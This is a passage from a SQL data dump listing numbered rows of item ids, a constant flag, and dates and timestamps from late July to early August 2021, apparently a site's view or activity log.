21:43:42'),(29378,2751,1,'2021-07-29','2021-07-29 21:59:17'),(29379,68,1,'2021-07-29','2021-07-29 22:52:34'),(29380,2751,1,'2021-07-29','2021-07-29 23:32:18'),(29381,2309,1,'2021-07-30','2021-07-30 00:22:43'),(29382,3489,1,'2021-07-30','2021-07-30 01:28:31'),(29383,1606,1,'2021-07-30','2021-07-30 01:43:48'),(29384,3731,1,'2021-07-30','2021-07-30 02:17:41'),(29385,89,1,'2021-07-30','2021-07-30 02:25:42'),(29386,2490,1,'2021-07-30','2021-07-30 03:06:52'),(29387,1588,1,'2021-07-30','2021-07-30 03:56:01'),(29388,2991,1,'2021-07-30','2021-07-30 04:06:43'),(29389,3307,1,'2021-07-30','2021-07-30 04:06:50'),(29390,3285,1,'2021-07-30','2021-07-30 06:43:19'),(29391,1778,1,'2021-07-30','2021-07-30 06:56:46'),(29392,2309,1,'2021-07-30','2021-07-30 07:06:03'),(29393,2658,1,'2021-07-30','2021-07-30 07:54:57'),(29394,1778,1,'2021-07-30','2021-07-30 07:56:47'),(29395,2658,1,'2021-07-30','2021-07-30 08:24:57'),(29396,3731,1,'2021-07-30','2021-07-30 08:54:56'),(29397,2964,1,'2021-07-30','2021-07-30 09:13:47'),(29398,1701,1,'2021-07-30','2021-07-30 09:29:14'),(29399,80,1,'2021-07-30','2021-07-30 10:35:28'),(29400,3705,1,'2021-07-30','2021-07-30 10:50:03'),(29401,1594,1,'2021-07-30','2021-07-30 10:59:18'),(29402,68,1,'2021-07-30','2021-07-30 11:14:48'),(29403,80,1,'2021-07-30','2021-07-30 11:17:21'),(29404,80,1,'2021-07-30','2021-07-30 11:18:47'),(29405,80,1,'2021-07-30','2021-07-30 12:38:37'),(29406,80,1,'2021-07-30','2021-07-30 12:38:43'),(29407,80,1,'2021-07-30','2021-07-30 12:38:56'),(29408,2457,1,'2021-07-30','2021-07-30 12:49:20'),(29409,3705,1,'2021-07-30','2021-07-30 12:49:43'),(29410,87,1,'2021-07-30','2021-07-30 13:30:47'),(29411,487,1,'2021-07-30','2021-07-30 13:31:17'),(29412,91,1,'2021-07-30','2021-07-30 13:31:39'),(29413,3030,1,'2021-07-30','2021-07-30 14:32:29'),(29414,1588,1,'2021-07-30','2021-07-30 15:10:17'),(29415,1602,1,'2021-07-30','2021-07-30 15:28:18'),(29416,1602,1,'2021-07-30','2021-07-30 15:31:50'),(29417,3030,1,'2021-07-30','2021-07-30 15:32:30'),(29418,3058,1,'2021-07-30','2021-07-30 16:03:03'),(29419,1588,1,'2021-07-30','2021-07-30 16:31:11'),(29420,1602,1,'2021-07-30','2021-07-30 16:32:16'),(29421,1544,1,'2021-07-30','2021-07-30 16:33:32'),(29422,2148,1,'2021-07-30','2021-07-30 18:12:26'),(29423,3245,1,'2021-07-30','2021-07-30 18:55:41'),(29424,1606,1,'2021-07-30','2021-07-30 18:55:44'),(29425,1594,1,'2021-07-30','2021-07-30 19:05:09'),(29426,89,1,'2021-07-30','2021-07-30 19:34:25'),(29427,1600,1,'2021-07-30','2021-07-30 20:17:19'),(29428,1588,1,'2021-07-30','2021-07-30 20:29:56'),(29429,1544,1,'2021-07-30','2021-07-30 20:35:50'),(29430,3541,1,'2021-07-30','2021-07-30 20:39:16'),(29431,570,1,'2021-07-30','2021-07-30 21:17:06'),(29432,80,1,'2021-07-30','2021-07-30 21:46:13'),(29433,1724,1,'2021-07-30','2021-07-30 22:00:13'),(29434,472,1,'2021-07-30','2021-07-30 22:16:15'),(29435,1734,1,'2021-07-30','2021-07-30 22:24:15'),(29436,1600,1,'2021-07-30','2021-07-30 22:26:16'),(29437,1610,1,'2021-07-30','2021-07-30 22:34:17'),(29438,2420,1,'2021-07-30','2021-07-30 23:04:16'),(29439,2490,1,'2021-07-30','2021-07-30 23:14:15'),(29440,3079,1,'2021-07-30','2021-07-30 23:24:15'),(29441,2964,1,'2021-07-31','2021-07-31 00:04:16'),(29442,1582,1,'2021-07-31','2021-07-31 00:24:19'),(29443,1610,1,'2021-07-31','2021-07-31 00:44:16'),(29444,2609,1,'2021-07-31','2021-07-31 01:44:23'),(29445,1600,1,'2021-07-31','2021-07-31 01:46:16'),(29446,1774,1,'2021-07-31','2021-07-31 02:06:26'),(29447,1582,1,'2021-07-31','2021-07-31 02:16:17'),(29448,3107,1,'2021-07-31','2021-07-31 02:33:28'),(29449,2809,1,'2021-07-31','2021-07-31 02:44:15'),(29450,468,1,'2021-07-31','2021-07-31 02:46:17'),(29451,1606,1,'2021-07-31','2021-07-31 02:48:11'),(29452,2704,1,'2021-07-31','2021-07-31 03:16:17'),(29453,108,1,'2021-07-31','2021-07-31 03:28:40'),(29454,89,1,'2021-07-31','2021-07-31 03:29:04'),(29455,1614,1,'2021-07-31','2021-07-31 03:46:16'),(29456,3705,1,'2021-07-31','2021-07-31 03:48:50'),(29457,3764,1,'2021-07-31','2021-07-31 04:16:16'),(29458,108,1,'2021-07-31','2021-07-31 04:18:59'),(29459,2704,1,'2021-07-31','2021-07-31 04:44:18'),(29460,1586,1,'2021-07-31','2021-07-31 04:46:15'),(29461,1602,1,'2021-07-31','2021-07-31 05:46:15'),(29462,1606,1,'2021-07-31','2021-07-31 05:49:38'),(29463,1734,1,'2021-07-31','2021-07-31 06:16:17'),(29464,2809,1,'2021-07-31','2021-07-31 06:44:16'),(29465,2609,1,'2021-07-31','2021-07-31 06:46:14'),(29466,3030,1,'2021-07-31','2021-07-31 06:49:59'),(29467,472,1,'2021-07-31','2021-07-31 07:14:15'),(29468,1602,1,'2021-07-31','2021-07-31 07:45:18'),(29469,1608,1,'2021-07-31','2021-07-31 10:17:22'),(29470,1582,1,'2021-07-31','2021-07-31 10:23:17'),(29471,3282,1,'2021-07-31','2021-07-31 10:23:21'),(29472,1778,1,'2021-07-31','2021-07-31 10:23:25'),(29473,3282,1,'2021-07-31','2021-07-31 11:09:08'),(29474,1600,1,'2021-07-31','2021-07-31 11:23:16'),(29475,91,1,'2021-07-31','2021-07-31 11:47:26'),(29476,1695,1,'2021-07-31','2021-07-31 11:50:46'),(29477,89,1,'2021-07-31','2021-07-31 11:52:08'),(29478,2457,1,'2021-07-31','2021-07-31 12:14:16'),(29479,80,1,'2021-07-31','2021-07-31 12:16:17'),(29480,1606,1,'2021-07-31','2021-07-31 12:16:40'),(29481,1606,1,'2021-07-31','2021-07-31 12:16:40'),(29482,2904,1,'2021-07-31','2021-07-31 13:13:24'),(29483,335,1,'2021-07-31','2021-07-31 13:13:37'),(29484,68,1,'2021-07-31','2021-07-31 13:14:04'),(29485,1877,1,'2021-07-31','2021-07-31 13:16:16'),(29486,1586,1,'2021-07-31','2021-07-31 14:14:18'),(29487,3079,1,'2021-07-31','2021-07-31 15:14:15'),(29488,3710,1,'2021-07-31','2021-07-31 15:16:17'),(29489,1776,1,'2021-07-31','2021-07-31 15:37:36'),(29490,1734,1,'2021-07-31','2021-07-31 16:14:16'),(29491,1614,1,'2021-07-31','2021-07-31 16:16:21'),(29492,2309,1,'2021-07-31','2021-07-31 16:23:20'),(29493,1594,1,'2021-07-31','2021-07-31 17:11:26'),(29494,1778,1,'2021-07-31','2021-07-31 17:11:27'),(29495,472,1,'2021-07-31','2021-07-31 17:14:16'),(29496,76,1,'2021-07-31','2021-07-31 17:26:23'),(29497,1778,1,'2021-07-31','2021-07-31 18:00:29'),(29498,80,1,'2021-07-31','2021-07-31 18:14:20'),(29499,1602,1,'2021-07-31','2021-07-31 18:46:17'),(29500,1592,1,'2021-07-31','2021-07-31 19:16:19'),(29501,1604,1,'2021-07-31','2021-07-31 19:31:30'),(29502,1776,1,'2021-07-31','2021-07-31 19:36:16'),(29503,80,1,'2021-07-31','2021-07-31 19:42:49'),(29504,1600,1,'2021-07-31','2021-07-31 19:44:18'),(29505,3181,1,'2021-07-31','2021-07-31 19:46:15'),(29506,89,1,'2021-07-31','2021-07-31 19:56:20'),(29507,1582,1,'2021-07-31','2021-07-31 20:14:18'),(29508,1600,1,'2021-07-31','2021-07-31 20:16:18'),(29509,1608,1,'2021-07-31','2021-07-31 20:24:20'),(29510,1695,1,'2021-07-31','2021-07-31 20:39:18'),(29511,3290,1,'2021-07-31','2021-07-31 20:44:16'),(29512,3764,1,'2021-07-31','2021-07-31 20:46:17'),(29513,3282,1,'2021-07-31','2021-07-31 20:54:43'),(29514,472,1,'2021-07-31','2021-07-31 21:14:16'),(29515,3307,1,'2021-07-31','2021-07-31 21:24:09'),(29516,3030,1,'2021-07-31','2021-07-31 21:34:25'),(29517,2989,1,'2021-07-31','2021-07-31 21:47:02'),(29518,2989,1,'2021-07-31','2021-07-31 21:47:43'),(29519,2775,1,'2021-07-31','2021-07-31 22:46:23'),(29520,80,1,'2021-07-31','2021-07-31 22:49:17'),(29521,80,1,'2021-07-31','2021-07-31 22:49:19'),(29522,80,1,'2021-07-31','2021-07-31 22:50:24'),(29523,1600,1,'2021-07-31','2021-07-31 23:02:06'),(29524,1695,1,'2021-07-31','2021-07-31 23:24:43'),(29525,2813,1,'2021-07-31','2021-07-31 23:44:49'),(29526,474,1,'2021-07-31','2021-07-31 23:46:16'),(29527,1734,1,'2021-08-01','2021-08-01 00:14:16'),(29528,1695,1,'2021-08-01','2021-08-01 00:24:42'),(29529,2989,1,'2021-08-01','2021-08-01 00:46:17'),(29530,472,1,'2021-08-01','2021-08-01 01:14:16'),(29531,1602,1,'2021-08-01','2021-08-01 01:23:44'),(29532,1586,1,'2021-08-01','2021-08-01 01:46:17'),(29533,3030,1,'2021-08-01','2021-08-01 02:05:09'),(29534,1594,1,'2021-08-01','2021-08-01 02:14:17'),(29535,3109,1,'2021-08-01','2021-08-01 02:21:26'),(29536,3060,1,'2021-08-01','2021-08-01 02:46:16'),(29537,1610,1,'2021-08-01','2021-08-01 03:14:22'),(29538,3710,1,'2021-08-01','2021-08-01 03:46:16'),(29539,2309,1,'2021-08-01','2021-08-01 03:46:18'),(29540,1602,1,'2021-08-01','2021-08-01 04:14:16'),(29541,1600,1,'2021-08-01','2021-08-01 04:56:43'),(29542,3030,1,'2021-08-01','2021-08-01 05:05:59'),(29543,76,1,'2021-08-01','2021-08-01 05:14:16'),(29544,1610,1,'2021-08-01','2021-08-01 05:16:16'),(29545,76,1,'2021-08-01','2021-08-01 05:46:17'),(29546,3705,1,'2021-08-01','2021-08-01 06:06:31'),(29547,1600,1,'2021-08-01','2021-08-01 06:14:17'),(29548,1614,1,'2021-08-01','2021-08-01 06:16:17'),(29549,1608,1,'2021-08-01','2021-08-01 06:22:41'),(29550,472,1,'2021-08-01','2021-08-01 06:29:14'),(29551,2989,1,'2021-08-01','2021-08-01 06:38:39'),(29552,3282,1,'2021-08-01','2021-08-01 06:52:40'),(29553,3710,1,'2021-08-01','2021-08-01 07:01:16'),(29554,476,1,'2021-08-01','2021-08-01 07:14:15'),(29555,3290,1,'2021-08-01','2021-08-01 07:16:15'),(29556,1582,1,'2021-08-01','2021-08-01 07:31:16'),(29557,2775,1,'2021-08-01','2021-08-01 07:44:16'),(29558,2775,1,'2021-08-01','2021-08-01 07:59:16'),(29559,1594,1,'2021-08-01','2021-08-01 08:14:16'),(29560,1695,1,'2021-08-01','2021-08-01 08:22:44'),(29561,2150,1,'2021-08-01','2021-08-01 08:38:22'),(29562,3181,1,'2021-08-01','2021-08-01 08:46:37'),(29563,472,1,'2021-08-01','2021-08-01 08:54:08'),(29564,2159,1,'2021-08-01','2021-08-01 08:58:09'),(29565,2457,1,'2021-08-01','2021-08-01 09:01:40'),(29566,476,1,'2021-08-01','2021-08-01 09:14:16'),(29567,2457,1,'2021-08-01','2021-08-01 09:16:40'),(29568,2309,1,'2021-08-01','2021-08-01 09:27:28'),(29569,2159,1,'2021-08-01','2021-08-01 09:38:18'),(29570,1594,1,'2021-08-01','2021-08-01 09:48:33'),(29571,1877,1,'2021-08-01','2021-08-01 09:59:16'),(29572,3181,1,'2021-08-01','2021-08-01 10:14:15'),(29573,1586,1,'2021-08-01','2021-08-01 10:18:45'),(29574,1588,1,'2021-08-01','2021-08-01 10:19:43'),(29575,1586,1,'2021-08-01','2021-08-01 10:21:09'),(29576,2309,1,'2021-08-01','2021-08-01 10:27:06'),(29577,486,1,'2021-08-01','2021-08-01 10:38:20'),(29578,1582,1,'2021-08-01','2021-08-01 10:44:16'),(29579,1606,1,'2021-08-01','2021-08-01 11:18:31'),(29580,474,1,'2021-08-01','2021-08-01 11:18:42'),(29581,1726,1,'2021-08-01','2021-08-01 11:38:18'),(29582,3251,1,'2021-08-01','2021-08-01 11:48:43'),(29583,1877,1,'2021-08-01','2021-08-01 11:49:14'),(29584,1726,1,'2021-08-01','2021-08-01 11:58:10'),(29585,89,1,'2021-08-01','2021-08-01 12:03:51'),(29586,3023,1,'2021-08-01','2021-08-01 12:29:16'),(29587,478,1,'2021-08-01','2021-08-01 12:29:50'),(29588,2813,1,'2021-08-01','2021-08-01 12:38:49'),(29589,80,1,'2021-08-01','2021-08-01 12:49:16'),(29590,478,1,'2021-08-01','2021-08-01 13:03:14'),(29591,474,1,'2021-08-01','2021-08-01 13:09:15'),(29592,1608,1,'2021-08-01','2021-08-01 13:43:14'),(29593,1602,1,'2021-08-01','2021-08-01 14:07:15'),(29594,1596,1,'2021-08-01','2021-08-01 14:19:02'),(29595,1588,1,'2021-08-01','2021-08-01 14:29:50'),(29596,1596,1,'2021-08-01','2021-08-01 14:41:15'),(29597,91,1,'2021-08-01','2021-08-01 14:41:39'),(29598,1596,1,'2021-08-01','2021-08-01 14:44:53'),(29599,1701,1,'2021-08-01','2021-08-01 14:45:44'),(29600,1586,1,'2021-08-01','2021-08-01 15:05:26'),(29601,1614,1,'2021-08-01','2021-08-01 16:12:05'),(29602,2769,1,'2021-08-01','2021-08-01 16:37:17'),(29603,1610,1,'2021-08-01','2021-08-01 16:38:55'),(29604,1600,1,'2021-08-01','2021-08-01 16:42:51'),(29605,3030,1,'2021-08-01','2021-08-01 17:30:39'),(29606,1586,1,'2021-08-01','2021-08-01 17:47:23'),(29607,76,1,'2021-08-01','2021-08-01 18:11:58'),(29608,3251,1,'2021-08-01','2021-08-01 18:17:24'),(29609,3030,1,'2021-08-01','2021-08-01 18:20:59'),(29610,2457,1,'2021-08-01','2021-08-01 18:42:00'),(29611,486,1,'2021-08-01','2021-08-01 19:09:17'),(29612,76,1,'2021-08-01','2021-08-01 19:12:02'),(29613,2159,1,'2021-08-01','2021-08-01 19:25:11'),(29614,1586,1,'2021-08-01','2021-08-01 19:39:16'),(29615,3664,1,'2021-08-01','2021-08-01 19:39:17'),(29616,3023,1,'2021-08-01','2021-08-01 19:41:59'),(29617,2159,1,'2021-08-01','2021-08-01 19:55:11'),(29618,1726,1,'2021-08-01','2021-08-01 20:09:16'),(29619,1877,1,'2021-08-01','2021-08-01 20:09:19'),(29620,1582,1,'2021-08-01','2021-08-01 20:12:00'),(29621,2150,1,'2021-08-01','2021-08-01 20:25:10'),(29622,3710,1,'2021-08-01','2021-08-01 20:39:15'),(29623,1726,1,'2021-08-01','2021-08-01 20:39:26'),(29624,1588,1,'2021-08-01','2021-08-01 20:55:10'),(29625,91,1,'2021-08-01','2021-08-01 21:03:27'),(29626,3251,1,'2021-08-01','2021-08-01 21:12:40'),(29627,2989,1,'2021-08-01','2021-08-01 21:19:15'),(29628,3664,1,'2021-08-01','2021-08-01 21:25:12'),(29629,1600,1,'2021-08-01','2021-08-01 21:27:20'),(29630,1594,1,'2021-08-01','2021-08-01 21:35:15'),(29631,1594,1,'2021-08-01','2021-08-01 21:35:17'),(29632,2457,1,'2021-08-01','2021-08-01 21:52:01'),(29633,3045,1,'2021-08-01','2021-08-01 22:12:06'),(29634,472,1,'2021-08-01','2021-08-01 22:39:17'),(29635,3290,1,'2021-08-01','2021-08-01 23:07:54'),(29636,3290,1,'2021-08-01','2021-08-01 23:39:16'),(29637,3060,1,'2021-08-02','2021-08-02 00:28:08'),(29638,3030,1,'2021-08-02','2021-08-02 02:53:49'),(29639,89,1,'2021-08-02','2021-08-02 03:05:34'),(29640,3030,1,'2021-08-02','2021-08-02 04:14:19'),(29641,2775,1,'2021-08-02','2021-08-02 04:57:10'),(29642,1778,1,'2021-08-02','2021-08-02 05:03:26'),(29643,1600,1,'2021-08-02','2021-08-02 05:17:26'),(29644,2159,1,'2021-08-02','2021-08-02 05:58:26'),(29645,2457,1,'2021-08-02','2021-08-02 06:26:53'),(29646,3664,1,'2021-08-02','2021-08-02 06:28:26'),(29647,3705,1,'2021-08-02','2021-08-02 06:55:29'),(29648,1726,1,'2021-08-02','2021-08-02 06:58:26'),(29649,1877,1,'2021-08-02','2021-08-02 07:03:37'),(29650,80,1,'2021-08-02','2021-08-02 07:11:53'),(29651,2150,1,'2021-08-02','2021-08-02 07:28:28'),(29652,472,1,'2021-08-02','2021-08-02 07:28:30'),(29653,1600,1,'2021-08-02','2021-08-02 07:36:48'),(29654,1602,1,'2021-08-02','2021-08-02 07:45:07'),(29655,3251,1,'2021-08-02','2021-08-02 07:53:25'),(29656,2159,1,'2021-08-02','2021-08-02 07:58:28'),(29657,1602,1,'2021-08-02','2021-08-02 08:10:02'),(29658,474,1,'2021-08-02','2021-08-02 08:18:20'),(29659,2309,1,'2021-08-02','2021-08-02 08:26:21'),(29660,72,1,'2021-08-02','2021-08-02 08:28:13'),(29661,87,1,'2021-08-02','2021-08-02 08:28:53'),(29662,89,1,'2021-08-02','2021-08-02 08:29:13'),(29663,91,1,'2021-08-02','2021-08-02 08:29:55'),(29664,1598,1,'2021-08-02','2021-08-02 08:36:40'),(29665,76,1,'2021-08-02','2021-08-02 08:36:51'),(29666,1582,1,'2021-08-02','2021-08-02 08:55:26'),(29667,1614,1,'2021-08-02','2021-08-02 09:14:01'),(29668,1870,1,'2021-08-02','2021-08-02 09:27:00'),(29669,3060,1,'2021-08-02','2021-08-02 09:32:32'),(29670,468,1,'2021-08-02','2021-08-02 09:51:04'),(29671,3245,1,'2021-08-02','2021-08-02 09:57:31'),(29672,2503,1,'2021-08-02','2021-08-02 10:00:20'),(29673,3051,1,'2021-08-02','2021-08-02 10:03:31'),(29674,1602,1,'2021-08-02','2021-08-02 10:48:07'),(29675,72,1,'2021-08-02','2021-08-02 11:03:29'),(29676,3030,1,'2021-08-02','2021-08-02 11:27:29'),(29677,2617,1,'2021-08-02','2021-08-02 11:34:46'),(29678,1544,1,'2021-08-02','2021-08-02 11:38:16'),(29679,3752,1,'2021-08-02','2021-08-02 11:41:43'),(29680,3752,1,'2021-08-02','2021-08-02 11:45:47'),(29681,3027,1,'2021-08-02','2021-08-02 11:50:30'),(29682,3066,1,'2021-08-02','2021-08-02 11:50:45'),(29683,3027,1,'2021-08-02','2021-08-02 11:51:02'),(29684,3710,1,'2021-08-02','2021-08-02 11:51:05'),(29685,3752,1,'2021-08-02','2021-08-02 11:51:18'),(29686,72,1,'2021-08-02','2021-08-02 12:03:26'),(29687,89,1,'2021-08-02','2021-08-02 12:07:39'),(29688,80,1,'2021-08-02','2021-08-02 12:16:35'),(29689,1602,1,'2021-08-02','2021-08-02 12:20:41'),(29690,1598,1,'2021-08-02','2021-08-02 12:58:34'),(29691,89,1,'2021-08-02','2021-08-02 13:01:06'),(29692,72,1,'2021-08-02','2021-08-02 13:03:24'),(29693,1598,1,'2021-08-02','2021-08-02 13:06:51'),(29694,76,1,'2021-08-02','2021-08-02 13:07:42'),(29695,68,1,'2021-08-02','2021-08-02 13:08:58'),(29696,76,1,'2021-08-02','2021-08-02 13:09:23'),(29697,89,1,'2021-08-02','2021-08-02 13:09:40'),(29698,3099,1,'2021-08-02','2021-08-02 13:28:26'),(29699,1602,1,'2021-08-02','2021-08-02 13:38:55'),(29700,1602,1,'2021-08-02','2021-08-02 13:38:57'),(29701,1602,1,'2021-08-02','2021-08-02 13:38:58'),(29702,1600,1,'2021-08-02','2021-08-02 13:44:33'),(29703,1606,1,'2021-08-02','2021-08-02 13:49:19'),(29704,1602,1,'2021-08-02','2021-08-02 13:50:28'),(29705,1602,1,'2021-08-02','2021-08-02 13:56:53'),(29706,570,1,'2021-08-02','2021-08-02 13:59:37'),(29707,1596,1,'2021-08-02','2021-08-02 14:01:27'),(29708,1778,1,'2021-08-02','2021-08-02 14:02:27'),(29709,2297,1,'2021-08-02','2021-08-02 14:08:12'),(29710,469,1,'2021-08-02','2021-08-02 14:18:25'),(29711,1778,1,'2021-08-02','2021-08-02 14:32:30'),(29712,1586,1,'2021-08-02','2021-08-02 14:42:04'),(29713,3030,1,'2021-08-02','2021-08-02 14:49:11'),(29714,2457,1,'2021-08-02','2021-08-02 14:56:33'),(29715,1776,1,'2021-08-02','2021-08-02 15:02:28'),(29716,1606,1,'2021-08-02','2021-08-02 15:09:22'),(29717,2769,1,'2021-08-02','2021-08-02 15:42:55'),(29718,1594,1,'2021-08-02','2021-08-02 16:06:35'),(29719,2309,1,'2021-08-02','2021-08-02 16:39:32'),(29720,472,1,'2021-08-02','2021-08-02 16:44:10'),(29721,1608,1,'2021-08-02','2021-08-02 16:45:46'),(29722,1602,1,'2021-08-02','2021-08-02 16:54:57'),(29723,3069,1,'2021-08-02','2021-08-02 17:11:56'),(29724,1602,1,'2021-08-02','2021-08-02 17:12:28'),(29725,3245,1,'2021-08-02','2021-08-02 17:22:07'),(29726,3245,1,'2021-08-02','2021-08-02 17:43:56'),(29727,2248,1,'2021-08-02','2021-08-02 17:44:16'),(29728,2159,1,'2021-08-02','2021-08-02 18:19:30'),(29729,468,1,'2021-08-02','2021-08-02 18:23:06'),(29730,1588,1,'2021-08-02','2021-08-02 18:41:12'),(29731,1604,1,'2021-08-02','2021-08-02 18:44:13'),(29732,2309,1,'2021-08-02','2021-08-02 19:08:20'),(29733,1594,1,'2021-08-02','2021-08-02 19:09:16'),(29734,1726,1,'2021-08-02','2021-08-02 19:19:37'),(29735,3104,1,'2021-08-02','2021-08-02 19:33:36'),(29736,2503,1,'2021-08-02','2021-08-02 19:33:51'),(29737,1606,1,'2021-08-02','2021-08-02 19:43:01'),(29738,89,1,'2021-08-02','2021-08-02 19:44:58'),(29739,1606,1,'2021-08-02','2021-08-02 20:02:41'),(29740,1602,1,'2021-08-02','2021-08-02 20:10:27'),(29741,486,1,'2021-08-02','2021-08-02 20:19:27'),(29742,1586,1,'2021-08-02','2021-08-02 20:31:04'),(29743,3261,1,'2021-08-02','2021-08-02 20:48:03'),(29744,1588,1,'2021-08-02','2021-08-02 23:25:35'),(29745,1606,1,'2021-08-02','2021-08-02 23:31:11'),(29746,1602,1,'2021-08-02','2021-08-02 23:50:27'),(29747,84,1,'2021-08-02','2021-08-02 23:52:38'),(29748,3691,1,'2021-08-02','2021-08-02 23:53:16'),(29749,91,1,'2021-08-02','2021-08-02 23:57:03'),(29750,1606,1,'2021-08-03','2021-08-03 00:18:46'),(29751,1778,1,'2021-08-03','2021-08-03 00:37:08'),(29752,1602,1,'2021-08-03','2021-08-03 00:39:15'),(29753,1606,1,'2021-08-03','2021-08-03 01:01:16'),(29754,1604,1,'2021-08-03','2021-08-03 01:07:02'),(29755,3104,1,'2021-08-03','2021-08-03 01:37:01'),(29756,1776,1,'2021-08-03','2021-08-03 01:37:04'),(29757,3030,1,'2021-08-03','2021-08-03 01:41:39'),(29758,3030,1,'2021-08-03','2021-08-03 01:51:20'),(29759,1586,1,'2021-08-03','2021-08-03 02:07:03'),(29760,2309,1,'2021-08-03','2021-08-03 02:15:26'),(29761,3030,1,'2021-08-03','2021-08-03 02:31:52'),(29762,89,1,'2021-08-03','2021-08-03 03:14:52'),(29763,472,1,'2021-08-03','2021-08-03 05:17:25'),(29764,3705,1,'2021-08-03','2021-08-03 05:22:22'),(29765,1766,1,'2021-08-03','2021-08-03 05:26:27'),(29766,3245,1,'2021-08-03','2021-08-03 06:02:08'),(29767,2248,1,'2021-08-03','2021-08-03 06:47:26'),(29768,2309,1,'2021-08-03','2021-08-03 06:52:59'),(29769,1600,1,'2021-08-03','2021-08-03 07:17:27'),(29770,2309,1,'2021-08-03','2021-08-03 07:19:29'),(29771,1592,1,'2021-08-03','2021-08-03 07:47:28'),(29772,3710,1,'2021-08-03','2021-08-03 08:17:26'),(29773,2503,1,'2021-08-03','2021-08-03 08:21:04'),(29774,1614,1,'2021-08-03','2021-08-03 08:47:31'),(29775,1602,1,'2021-08-03','2021-08-03 08:56:05'),(29776,1602,1,'2021-08-03','2021-08-03 08:56:40'),(29777,2159,1,'2021-08-03','2021-08-03 09:10:01'),(29778,3261,1,'2021-08-03','2021-08-03 09:17:24'),(29779,3752,1,'2021-08-03','2021-08-03 09:29:12'),(29780,1594,1,'2021-08-03','2021-08-03 09:47:25'),(29781,3058,1,'2021-08-03','2021-08-03 09:52:46'),(29782,570,1,'2021-08-03','2021-08-03 10:12:29'),(29783,1602,1,'2021-08-03','2021-08-03 10:30:00'),(29784,89,1,'2021-08-03','2021-08-03 11:03:09'),(29785,1749,1,'2021-08-03','2021-08-03 11:17:24'),(29786,1602,1,'2021-08-03','2021-08-03 11:39:36'),(29787,3764,1,'2021-08-03','2021-08-03 11:56:23'),(29788,3764,1,'2021-08-03','2021-08-03 11:56:46'),(29789,3764,1,'2021-08-03','2021-08-03 11:58:40'),(29790,1606,1,'2021-08-03','2021-08-03 12:38:24'),(29791,1592,1,'2021-08-03','2021-08-03 12:39:07'),(29792,1582,1,'2021-08-03','2021-08-03 12:50:56'),(29793,1592,1,'2021-08-03','2021-08-03 12:58:17'),(29794,570,1,'2021-08-03','2021-08-03 13:05:26'),(29795,2609,1,'2021-08-03','2021-08-03 13:06:11'),(29796,2609,1,'2021-08-03','2021-08-03 13:06:12'),(29797,2769,1,'2021-08-03','2021-08-03 13:35:09'),(29798,1602,1,'2021-08-03','2021-08-03 13:58:51'),(29799,3781,1,'2021-08-03','2021-08-03 14:30:48'),(29800,1749,1,'2021-08-03','2021-08-03 14:33:18'),(29801,1594,1,'2021-08-03','2021-08-03 14:56:47'),(29802,1592,1,'2021-08-03','2021-08-03 15:28:29'),(29803,1612,1,'2021-08-03','2021-08-03 15:43:00'),(29804,1604,1,'2021-08-03','2021-08-03 15:58:30'),(29805,1592,1,'2021-08-03','2021-08-03 16:17:24'),(29806,1606,1,'2021-08-03','2021-08-03 16:24:11'),(29807,1592,1,'2021-08-03','2021-08-03 17:17:24'),(29808,1582,1,'2021-08-03','2021-08-03 17:47:31'),(29809,89,1,'2021-08-03','2021-08-03 18:17:05'),(29810,1766,1,'2021-08-03','2021-08-03 18:18:11'),(29811,2297,1,'2021-08-03','2021-08-03 18:19:04'),(29812,3752,1,'2021-08-03','2021-08-03 18:43:11'),(29813,1582,1,'2021-08-03','2021-08-03 18:44:47'),(29814,1586,1,'2021-08-03','2021-08-03 19:17:27'),(29815,91,1,'2021-08-03','2021-08-03 19:39:48'),(29816,1600,1,'2021-08-03','2021-08-03 20:02:17'),(29817,2159,1,'2021-08-03','2021-08-03 20:11:28'),(29818,1766,1,'2021-08-03','2021-08-03 20:24:29'),(29819,1749,1,'2021-08-03','2021-08-03 20:46:52'),(29820,1606,1,'2021-08-03','2021-08-03 21:45:05'),(29821,3541,1,'2021-08-03','2021-08-03 22:44:03'),(29822,1586,1,'2021-08-03','2021-08-03 23:51:45'),(29823,1614,1,'2021-08-03','2021-08-03 23:59:35'),(29824,1602,1,'2021-08-04','2021-08-04 00:21:43'),(29825,2309,1,'2021-08-04','2021-08-04 00:51:37'),(29826,2457,1,'2021-08-04','2021-08-04 00:51:43'),(29827,1602,1,'2021-08-04','2021-08-04 01:07:13'),(29828,1602,1,'2021-08-04','2021-08-04 01:11:48'),(29829,1602,1,'2021-08-04','2021-08-04 01:12:44'),(29830,1602,1,'2021-08-04','2021-08-04 01:20:26'),(29831,3060,1,'2021-08-04','2021-08-04 01:31:37'),(29832,1602,1,'2021-08-04','2021-08-04 02:29:35'),(29833,2989,1,'2021-08-04','2021-08-04 02:31:51'),(29834,1749,1,'2021-08-04','2021-08-04 03:00:05'),(29835,1594,1,'2021-08-04','2021-08-04 03:57:09'),(29836,1582,1,'2021-08-04','2021-08-04 03:59:34'),(29837,1602,1,'2021-08-04','2021-08-04 04:25:01'),(29838,1594,1,'2021-08-04','2021-08-04 04:54:31'),(29839,1594,1,'2021-08-04','2021-08-04 04:55:25'),(29840,1592,1,'2021-08-04','2021-08-04 04:59:35'),(29841,1608,1,'2021-08-04','2021-08-04 05:53:25'),(29842,1608,1,'2021-08-04','2021-08-04 05:58:32'),(29843,1749,1,'2021-08-04','2021-08-04 07:02:39'),(29844,1586,1,'2021-08-04','2021-08-04 07:32:41'),(29845,570,1,'2021-08-04','2021-08-04 07:42:38'),(29846,1614,1,'2021-08-04','2021-08-04 07:52:47'),(29847,1602,1,'2021-08-04','2021-08-04 07:58:53'),(29848,1724,1,'2021-08-04','2021-08-04 08:02:42'),(29849,3261,1,'2021-08-04','2021-08-04 08:42:38'),(29850,2159,1,'2021-08-04','2021-08-04 09:06:15'),(29851,3226,1,'2021-08-04','2021-08-04 09:12:57'),(29852,2161,1,'2021-08-04','2021-08-04 09:29:47'),(29853,80,1,'2021-08-04','2021-08-04 09:32:24'),(29854,80,1,'2021-08-04','2021-08-04 09:33:42'),(29855,2159,1,'2021-08-04','2021-08-04 09:37:15'),(29856,1604,1,'2021-08-04','2021-08-04 09:49:44'),(29857,3705,1,'2021-08-04','2021-08-04 09:54:57'),(29858,570,1,'2021-08-04','2021-08-04 10:12:46'),(29859,2609,1,'2021-08-04','2021-08-04 10:19:33'),(29860,1598,1,'2021-08-04','2021-08-04 10:21:37'),(29861,91,1,'2021-08-04','2021-08-04 10:22:03'),(29862,1598,1,'2021-08-04','2021-08-04 10:23:29'),(29863,1594,1,'2021-08-04','2021-08-04 